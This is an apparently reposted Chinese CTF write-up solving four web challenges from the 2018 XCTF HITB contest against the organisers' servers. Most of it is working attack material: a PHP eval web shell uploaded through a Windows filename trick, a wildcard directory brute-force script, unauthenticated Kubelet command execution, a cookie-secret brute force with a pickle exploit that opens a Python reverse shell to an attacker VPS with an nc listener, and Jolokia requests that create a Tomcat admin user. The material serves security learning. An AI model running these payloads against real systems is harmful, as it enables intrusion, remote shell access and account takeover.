2018-XCTF-HITB-WEB
访问题目
http://47.90.97.18:9999/
看到2个功能
upload.php pic.php
查看pic.php
http://47.90.97.18:9999/pic.php?filename=default.jpg
得到回显
width=497 height=477
发现可以解析图片,这里尝试了一会儿文件包含
发现回显基本都是
image error
后来抓包的时候看到
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/7.0 X-Powered-By: PHP/5.6.35 Date: Fri, 13 Apr 2018 13:30:00 GMT Connection: close Content-Length: 18
发现对方是
windows iis7.0
想到一些上传技巧
尝试上传 1.php
(注意,php后有一个空格)
发现成功可以上传php文件,并且由于windows文件名的问题,最后的空格会被去掉,所以
1.php(空格)
会变成 1.php
但是新的问题来了,我们没有上传文件夹路径
后来百度windows 目录爆破的时候发现百度第一条文章
http://www.moonsec.com/post-304.html
其中写道到
已知1.php存在,以上脚本访问的结果是: 1.php 1.phP 1.ph< 1.ph> 都能得到返回。
发现
< >
可以进行通配
根据这一点继续搜索,发现文章
http://www.freebuf.com/column/164698.html
其中提及dedecms的后台目录爆破方式
...
function my_func($url, $path =''){
$ch = curl_init($url);
$i = 48;
global $version;
while($i <= 90) {
if((48 <= $i && $i <= 57) or (65 <= $i && $i <= 90)) {
if($version != '5.7') {
/* v5.6版本及其以下 */
$admin_path = './' . $path . chr($i) . '</img/admin_top_logo.gif';
}
else {
/* v5.7版本 */
$admin_path = './' . $path . chr($i) . '</images/admin_top_logo.gif';
}
$data = 'dopost=save&_FILES[b4dboy][tmp_name]=' . $admin_path . '&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image/gif';
$options = array(
CURLOPT_USERAGENT => 'Firefox/58.0',
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $data,
);
curl_setopt_array($ch, $options);
$response = curl_exec($ch);
if(!preg_match('/(Upload filetype not allow !)/i', $response)) {
$path = $path . chr($i);
return $path;
}
}
$i++;
}
...
受到通配爆破的启发,我尝试
http://47.90.97.18:9999/pic.php?filename=../a</default.jpg
发现通配成功
width=497 height=477
得到回显
于是写脚本进行fuzz
# coding=UTF-8
import requests
url = "http://47.90.97.18:9999/pic.php?filename=../"
flag = ""
for i in range(1,100):
for j in '0123456789abcdefghijklmnopqrstuvwxyz':
url1 = url+flag+j+'</default.jpg'
r = requests.get(url=url1)
if "height" in r.content:
flag +=j
print url1
break
运行后得到目录
87194f13726af7cee27ba2cfe97b60df
后上传一句话木马
<?php @eval($_POST['sky']); ?>
然后菜刀连接
http://47.90.97.18:9999/87194f13726af7cee27ba2cfe97b60df/1523496144.php
成功拿到flag
<?php
echo "flag is here";
//HITB{e5f476c1e4c6dc66278db95f0b5a228a}
?>
故此拿到flag
HITB{e5f476c1e4c6dc66278db95f0b5a228a}
Baby baby
这题侥幸拿了3血XD
拿到题目后,提示是
This is a pentest challenge, open your mind!
扫了一下端口发现
3个端口开放
然后在9999端口拿到源码
This is a pentest challenge, open your mind!
<img style="width: 300px;" src="jd.png" alt="the picture is unrelated to this challenge, just a advertisement" />
<?php
eval($__POST["backdoor"]);
?>
发现是在逗我没错了,根本无法使用
后来入手10250端口
发现RR巨佬的文章
https://ricterz.me/posts/Security%20Issues%20of%20Kubelet%20HTTP%28s%29%20Server
发现突破点:
Kubelet 在 10250 端口上提供了一个 HTTPS 的 API,通过这个 API 可以控制
在 Kubelet 的老版本(1.5 之前)不支持认证和授权,这就导致攻击者可以通过访问 10250 端口的 API 来获取容器权限。
而我们可以通过 /runningpods
获取正在运行的 Pod
列表:
于是我尝试指令
http --verify=no https://47.75.146.42:10250/runningpods/
得到回显
HTTP/1.1 200 OK
Content-Type: application/json
Date: Thu, 12 Apr 2018 07:00:22 GMT
Transfer-Encoding: chunked
{
"apiVersion": "v1",
"items": [
{
"metadata": {
"creationTimestamp": null,
"name": "kubernetes-dashboard-688193819-svbx3",
"namespace": "kube-system",
"uid": "958e5dcc-3c7e-11e8-b3d6-00163e0245e7"
},
"spec": {
"containers": [
{
"image": "127.0.0.1:5000/google_containers/kubernetes-dashboard-amd64@sha256:1344175a7b6502e012102c05201d16e572c4daf803f92d2d2c07b0ac8ffb9110",
"name": "kubernetes-dashboard",
"resources": {}
}
]
},
"status": {}
},
{
"metadata": {
"creationTimestamp": null,
"name": "web-test-4092782360-035qx",
"namespace": "esn-system",
"uid": "a8f7e307-3e14-11e8-838a-00163e0245e7"
},
"spec": {
"containers": [
{
"image": "127.0.0.1:5000/esn-containers/web_test@sha256:ae129fcd94bd2978db37050f95c62311f5bf9fdbba25817e6e8a098db3a168cf",
"name": "web-test",
"resources": {}
}
]
},
"status": {}
},
{
"metadata": {
"creationTimestamp": null,
"name": "kube-dns-3757701935-jht7p",
"namespace": "kube-system",
"uid": "97583356-3c7e-11e8-b3d6-00163e0245e7"
},
"spec": {
"containers": [
{
"image": "127.0.0.1:5000/google_containers/k8s-dns-sidecar-amd64@sha256:1d3b5c493e3c8ff05262192dce1807e19375406d7a159b1c5c463144ad1c47d5",
"name": "sidecar",
"resources": {}
},
{
"image": "127.0.0.1:5000/google_containers/k8s-dns-dnsmasq-nanny-amd64@sha256:13f5523c0c2422447167a5aa08a16c07e3c78db113373da312e67a78eb04c981",
"name": "dnsmasq",
"resources": {}
},
{
"image": "127.0.0.1:5000/google_containers/k8s-dns-kube-dns-amd64@sha256:bcfbfd0cf6c20b17d6797c1901d17653802b1b2f31d5901698e629f23b9b60e6",
"name": "kubedns",
"resources": {}
}
]
},
"status": {}
},
{
"metadata": {
"creationTimestamp": null,
"name": "monitoring-grafana-3238376892-r3r57",
"namespace": "kube-system",
"uid": "96f720d7-3c7e-11e8-b3d6-00163e0245e7"
},
"spec": {
"containers": [
{
"image": "127.0.0.1:5000/google_containers/heapster-grafana-amd64@sha256:0b077080cff3bb20a6e89bdd3b2f05f36479ee1edf7e91732d0578ea57753b33",
"name": "grafana",
"resources": {}
}
]
},
"status": {}
},
{
"metadata": {
"creationTimestamp": null,
"name": "heapster-3876467971-j942t",
"namespace": "kube-system",
"uid": "972fc55d-3c7e-11e8-b3d6-00163e0245e7"
},
"spec": {
"containers": [
{
"image": "127.0.0.1:5000/google_containers/heapster-amd64@sha256:fb618adfed191f97b303603df043f75a42f4c1d6a4d625a0ee0cda81890c9fd0",
"name": "heapster",
"resources": {}
}
]
},
"status": {}
},
{
"metadata": {
"creationTimestamp": null,
"name": "monitoring-influxdb-4196588620-k597p",
"namespace": "kube-system",
"uid": "977f4ae8-3c7e-11e8-b3d6-00163e0245e7"
},
"spec": {
"containers": [
{
"image": "127.0.0.1:5000/google_containers/heapster-influxdb-amd64@sha256:961319e26e359294ac86294d8029d1c78e697d617ca0d645d3b227a8bd9a7817",
"name": "influxdb",
"resources": {}
}
]
},
"status": {}
}
],
"kind": "PodList",
"metadata": {}
}
不难看到关键点
"metadata": {
"creationTimestamp": null,
"name": "web-test-4092782360-035qx",
"namespace": "esn-system",
"uid": "a8f7e307-3e14-11e8-838a-00163e0245e7"
},
"spec": {
"containers": [
{
"image": "127.0.0.1:5000/esn-containers/web_test@sha256:ae129fcd94bd2978db37050f95c62311f5bf9fdbba25817e6e8a098db3a168cf",
"name": "web-test",
"resources": {}
这里可以看到几个关键点
pod_name:web-test-4092782360-035qx namespace:esn-system container_name:web-test
故此可以使用指令
http --form --verify=no POST https://目标ip:port/run/namespace/pod_name/container_name cmd='ls /'
即
http --form --verify=no POST https://47.75.146.42:10250/run/esn-system/web-test-4092782360-035qx/web-test cmd='ls /'
进行命令执行
回显
HTTP/1.1 200 OK Content-Length: 101 Content-Type: application/json Date: Thu, 12 Apr 2018 07:01:06 GMT bin core dev etc flag.txt home lib linuxrc media mnt proc root run sbin srv start.sh sys tmp usr var
发现成功读取根目录信息
我们直接cat flag
即
http --form --verify=no POST https://47.75.146.42:10250/run/esn-system/web-test-4092782360-035qx/web-test cmd='cat /flag.txt'
得到回显
HTTP/1.1 200 OK
Content-Length: 176
Content-Type: application/json
Date: Thu, 12 Apr 2018 07:00:53 GMT
HITB{KKKKKKKKKKKKKKKKKKKKKKKKK}
DO NOT MODIFY ANYTHING.
WE WILL BAN YOUR TEAM IF YOU CHANG FLAG, DELETE FILES, ETC.
如果你修改、删除文件,我们会 ban 掉你 :D
故此拿到flag:
HITB{KKKKKKKKKKKKKKKKKKKKKKKKK}
Python’s revenge
题目直接给出了源码
from __future__ import unicode_literals
from flask import Flask, request, make_response, redirect, url_for, session
from flask import render_template, flash, redirect, url_for, request
from werkzeug.security import safe_str_cmp
from base64 import b64decode as b64d
from base64 import b64encode as b64e
from hashlib import sha256
from cStringIO import StringIO
import random
import string
import os
import sys
import subprocess
import commands
import pickle
import cPickle
import marshal
import os.path
import filecmp
import glob
import linecache
import shutil
import dircache
import io
import timeit
import popen2
import code
import codeop
import pty
import posixfile
SECRET_KEY = 'you will never guess'
if not os.path.exists('.secret'):
with open(".secret", "w") as f:
secret = ''.join(random.choice(string.ascii_letters + string.digits)
for x in range(4))
f.write(secret)
with open(".secret", "r") as f:
cookie_secret = f.read().strip()
app = Flask(__name__)
app.config.from_object(__name__)
black_type_list = [eval, execfile, compile, open, file, os.system, os.popen, os.popen2, os.popen3, os.popen4, os.fdopen, os.tmpfile, os.fchmod, os.fchown, os.open, os.openpty, os.read, os.pipe, os.chdir, os.fchdir, os.chroot, os.chmod, os.chown, os.link, os.lchown, os.listdir, os.lstat, os.mkfifo, os.mknod, os.access, os.mkdir, os.makedirs, os.readlink, os.remove, os.removedirs, os.rename, os.renames, os.rmdir, os.tempnam, os.tmpnam, os.unlink, os.walk, os.execl, os.execle, os.execlp, os.execv, os.execve, os.dup, os.dup2, os.execvp, os.execvpe, os.fork, os.forkpty, os.kill, os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe, os.spawnv, os.spawnve, os.spawnvp, os.spawnvpe, pickle.load, pickle.loads, cPickle.load, cPickle.loads, subprocess.call, subprocess.check_call, subprocess.check_output, subprocess.Popen, commands.getstatusoutput, commands.getoutput, commands.getstatus, glob.glob, linecache.getline, shutil.copyfileobj, shutil.copyfile, shutil.copy, shutil.copy2, shutil.move, shutil.make_archive, dircache.listdir, dircache.opendir, io.open, popen2.popen2, popen2.popen3, popen2.popen4, timeit.timeit, timeit.repeat, sys.call_tracing, code.interact, code.compile_command, codeop.compile_command, pty.spawn, posixfile.open, posixfile.fileopen]
@app.before_request
def count():
session['cnt'] = 0
@app.route('/')
def home():
remembered_str = 'Hello, here/'s what we remember for you. And you can change, delete or extend it.'
new_str = 'Hello fellow zombie, have you found a tasty brain and want to remember where? Go right here and enter it:'
location = getlocation()
if location == False:
return redirect(url_for("clear"))
return render_template('index.html', txt=remembered_str, location=location)
@app.route('/clear')
def clear():
flash("Reminder cleared!")
response = redirect(url_for('home'))
response.set_cookie('location', max_age=0)
return response
@app.route('/reminder', methods=['POST', 'GET'])
def reminder():
if request.method == 'POST':
location = request.form["reminder"]
if location == '':
flash("Message cleared, tell us when you have found more brains.")
else:
flash("We will remember where you find your brains.")
location = b64e(pickle.dumps(location))
cookie = make_cookie(location, cookie_secret)
response = redirect(url_for('home'))
response.set_cookie('location', cookie)
return response
location = getlocation()
if location == False:
return redirect(url_for("clear"))
return render_template('reminder.html')
class FilterException(Exception):
def __init__(self, value):
super(FilterException, self).__init__(
'The callable object {value} is not allowed'.format(value=str(value)))
class TimesException(Exception):
def __init__(self):
super(TimesException, self).__init__(
'Call func too many times!')
def _hook_call(func):
def wrapper(*args, **kwargs):
session['cnt'] += 1
print session['cnt']
print args[0].stack
for i in args[0].stack:
if i in black_type_list:
raise FilterException(args[0].stack[-2])
if session['cnt'] > 4:
raise TimesException()
return func(*args, **kwargs)
return wrapper
def loads(strs):
reload(pickle)
files = StringIO(strs)
unpkler = pickle.Unpickler(files)
unpkler.dispatch[pickle.REDUCE] = _hook_call(
unpkler.dispatch[pickle.REDUCE])
return unpkler.load()
def getlocation():
cookie = request.cookies.get('location')
if not cookie:
return ''
(digest, location) = cookie.split("!")
if not safe_str_cmp(calc_digest(location, cookie_secret), digest):
flash("Hey! This is not a valid cookie! Leave me alone.")
return False
location = loads(b64d(location))
return location
def make_cookie(location, secret):
return "%s!%s" % (calc_digest(location, secret), location)
def calc_digest(location, secret):
return sha256("%s%s" % (location, secret)).hexdigest()
if __name__ == '__main__':
app.run(host="0.0.0.0", port=5051)
发现与强网杯的类似
参考链接
http://skysec.top/2018/04/01/Python-is-the-best-language/
注意到getlocation()函数中反序列化操作
location = loads(b64d(location))
跟location的由来
location = request.form["reminder"]
if location == '':
flash("Message cleared, tell us when you have found more brains.")
else:
flash("We will remember where you find your brains.")
location = b64e(pickle.dumps(location))
cookie = make_cookie(location, cookie_secret)
response = redirect(url_for('home'))
response.set_cookie('location', cookie)
然后生成的cookie
def getlocation():
cookie = request.cookies.get('location')
if not cookie:
return ''
(digest, location) = cookie.split("!")
if not safe_str_cmp(calc_digest(location, cookie_secret), digest):
flash("Hey! This is not a valid cookie! Leave me alone.")
return False
location = loads(b64d(location))
最后发现只要能控制cookie即可随意更改反序列化的值
但是问题来了,没有
cookie_secret
跟一下发现
if not os.path.exists('.secret'):
with open(".secret", "w") as f:
secret = ''.join(random.choice(string.ascii_letters + string.digits)
for x in range(4))
f.write(secret)
with open(".secret", "r") as f:
cookie_secret = f.read().strip()
cookie_secret只有4位的长度,很快就能爆破出来
我们写脚本
from hashlib import sha256
import pickle
import cPickle
from base64 import b64decode as b64d
from base64 import b64encode as b64e
import random
import string
def make_cookie(location, secret):
return "%s!%s" % (calc_digest(location, secret), location)
def calc_digest(location, secret):
return sha256("%s%s" % (location, secret)).hexdigest()
for x1 in string.ascii_letters + string.digits:
for x2 in string.ascii_letters + string.digits:
for x3 in string.ascii_letters + string.digits:
for x4 in string.ascii_letters + string.digits:
cookie_secret = x1+x2+x3+x4
location = "VjExMQpwMAou"
cookie = make_cookie(location, cookie_secret)
#print cookie
if cookie == "73ec41cd2804d3ad0a606c66d02d9d2234ba4ff0c4dc02f69555157beab99d9f!VjExMQpwMAou":
print cookie_secret
break
运行得到cookie_secret
hitb
然后就是构造类,bypass沙盒黑名单了
注意到黑名单未过滤
platform.popen
于是构造类
class Exploit(object):
def __reduce__(self):
return (platform.popen,("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((/"127.0.0.1/",23333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([/"/bin/sh/",/"-i/"]);'",))
def serialize_exploit():
shellcode = pickle.dumps(Exploit())
return shellcode
最后脚本
import pickle
import platform
from base64 import b64encode as b64e
import string
from hashlib import sha256
def make_cookie(location, secret):
return "%s!%s" % (calc_digest(location, secret), location)
def calc_digest(location, secret):
return sha256("%s%s" % (location, secret)).hexdigest()
class Exploit(object):
def __reduce__(self):
return (platform.popen,("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((/"你的vps/",23333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([/"/bin/sh/",/"-i/"]);'",))
def serialize_exploit():
shellcode = pickle.dumps(Exploit())
return shellcode
location = b64e(serialize_exploit())
cookie_secret = "hitb"
cookie = make_cookie(location, cookie_secret)
print cookie
运行得到
6c9bb5a6c403532334724160875f921baef27b8e8be27d0a3db3d49dd84d8ee4!Y3BsYXRmb3JtCnBvcGVuCnAwCihTJ3B5dGhvbiAtYyBcJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKCIxMjcuMC4wLjEiLDIzMzMzKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7IG9zLmR1cDIocy5maWxlbm8oKSwyKTtwPXN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKTtcJycKcDEKdHAyClJwMwou
接着在你的vps上打开端口监听
nc -l -vv -p 23333
然后更改cookie中的location为此值,刷新页面得到
<open file 'python -c /'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("138.68.225.135",23333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);/'', mode 'r' at 0x7fdb5f9e1c00>
查看vps端口监听
Listening on [0.0.0.0] (family 0, port 23333) Connection from [47.75.151.118] port 23333 [tcp/*] accepted (family 2, sport 52880) /bin/sh: 0: can't access tty; job control turned off $
发现收到shell
执行命令
$ ls app.py app.pyc run.py run.pyc static templates
发现成功
于是探寻flag
$ cd ..
$ ls
bin
boot
dev
easy_sandbox
etc
flag_is_here
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
$ cat flag_is_here
HITB{Py5h0n1st8eBe3tNOW}
最后成功拿到flag
HITB{Py5h0n1st8eBe3tNOW}
Baby Nya
看到提示
the tomcat deployed jolokia.war
扫描端口,看见
端口开放
根据文章
https://ionize.com.au/exploiting-apache-tomcat-port-8009-using-apache-jserv-protocol/
进行如下操作
Step 1: Install the Dependencies The first line installs the mod-jk package which allows Apache to forward requests to Tomcat using the AJP protocol. It can communication to Tomcat on the local machine or to a remote instance. The second line enables the proxy_ajp module and required dependencies automatically.
指令
apt install libapache2-mod-jk a2enmod proxy_ajp
然后
Step 2: Configure Apache Next create a configuration file in /etc/apache2/sites-enabled/ which will hold our proxy setup, I’ve named mine ajp.conf.
文件内容
ProxyRequests Off # Only allow localhost to proxy requests <Proxy *> Order deny,allow Deny from all Allow from localhost </Proxy> # Change the IP address in the below lines to the remote servers IP address hosting the Tomcat instance ProxyPass / ajp://192.168.109.134:8009/ ProxyPassReverse / ajp://192.168.109.134:8009/
然后重启apache2,接着指令
systemctl start apache2
即可在本地访问到题目的8009端口
后来看到这样一篇文章
https://ricterz.me/posts/Exploiting%20Jolokia%20Agent%20with%20Java%20EE%20Servers
发现可以添加管理员用户
// 创建 manager-gui
{
"type": "EXEC",
"mbean": "Users:database=UserDatabase,type=UserDatabase",
"operation": "createRole",
"arguments": ["manager-gui", ""]
}
// 创建用户
{
"type": "EXEC",
"mbean": "Users:database=UserDatabase,type=UserDatabase",
"operation": "createUser",
"arguments": ["test233", "test233", ""]
}
// 增加角色
{
"type": "EXEC",
"mbean": "Users:database=UserDatabase,type=User,username=/"test233/"",
"operation": "addRole",
"arguments": ["manager-gui"]
}
接着利用 test233 / test233 登陆即可
最后直接在
/manager/html
看到flag
正文到此结束
- 本文标签: ldap DOM tomcat lib tar kk IO apache TCP cmd list https http UI bean linux Pods root 解析 db Connection 文章 图片 java Google tab value git ask apr Security Dashboard apache2 Kubernetes remote Uber DNS python 目录 API cache 认证 key ip core cat message id PHP HTML 端口 百度 突破 ACE vps 管理 ORM 源码 json shell src find Job MQ web App windows dependencies js 删除 logo IDE ioc
- 版权声明: 本文为互联网转载文章,出处已在文章中说明(部分除外)。如果侵权,请联系本站长删除,谢谢。
- 本文海报: 生成海报一 生成海报二
热门推荐
相关文章
Loading...
![[HBLOG]公众号](https://www.liuhaihua.cn/img/qrcode_gzh.jpg)
